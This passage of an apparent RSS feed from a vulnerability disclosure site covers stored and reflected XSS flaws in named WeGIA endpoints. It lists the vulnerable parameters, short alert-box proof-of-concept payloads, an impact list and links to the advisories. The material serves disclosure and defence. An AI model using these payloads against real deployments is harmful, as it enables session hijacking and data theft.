    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/rafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 16 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-53933</title>
        <link>https://www.cvehunters.com/p/cve-2025-53933/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-53933/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-53933-cross-site-scripting-xss-stored-endpoint-adicionar_enfermidadephp-parameter-nome&amp;#34;&amp;gt;CVE-2025-53933: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;adicionar_enfermidade.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53933&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53933&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;adicionar_enfermidade.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /html/saude/adicionar_enfermidade.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-53933-cross-site-scripting-xss-stored-endpoint-adicionar_enfermidadephp-parameter-nome&amp;#34;&amp;gt;CVE-2025-53933: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;adicionar_enfermidade.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53933&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53933&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;adicionar_enfermidade.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /html/saude/adicionar_enfermidade.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt; &amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/image.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-6558-m8rp-5qg6&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-6558-m8rp-5qg6&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributor&amp;#34;&amp;gt;Contributor
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 16 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-53934</title>
        <link>https://www.cvehunters.com/p/cve-2025-53934/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-53934/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-53934-cross-site-scripting-xss-stored-endpoint-controlphp-parameter-descricao_emergencia&amp;#34;&amp;gt;CVE-2025-53934: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;descricao_emergencia&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53934&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53934&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;descricao_emergencia&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /controle/control.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-53934-cross-site-scripting-xss-stored-endpoint-controlphp-parameter-descricao_emergencia&amp;#34;&amp;gt;CVE-2025-53934: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;descricao_emergencia&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53934&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53934&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;descricao_emergencia&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /controle/control.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;descricao_emergencia&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;descricao_emergencia&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;E&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;Cimg&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;20&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;20&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC4&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;E&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53934/image.png&amp;#34;
	width=&amp;#34;663&amp;#34;
	height=&amp;#34;863&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53934/image_hu_e7287864ea99b304.png 480w, /p/cve-2025-53934/image_hu_1028345ab47dc2e9.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;76&amp;#34;
		data-flex-basis=&amp;#34;184px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-gqwp-637v-v49v&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-gqwp-637v-v49v&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributor&amp;#34;&amp;gt;Contributor
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 16 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-53935</title>
        <link>https://www.cvehunters.com/p/cve-2025-53935/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-53935/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-53935-cross-site-scripting-xss-reflected-endpoint-personalizacao_selecaophp-parameter-id&amp;#34;&amp;gt;CVE-2025-53935: Cross-Site Scripting (XSS) Reflected endpoint &amp;lt;code&amp;gt;personalizacao_selecao.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53935&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53935&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;personalizacao_selecao.php&amp;lt;/code&amp;gt; endpoint of the WeGia application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /html/personalizacao_selecao.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
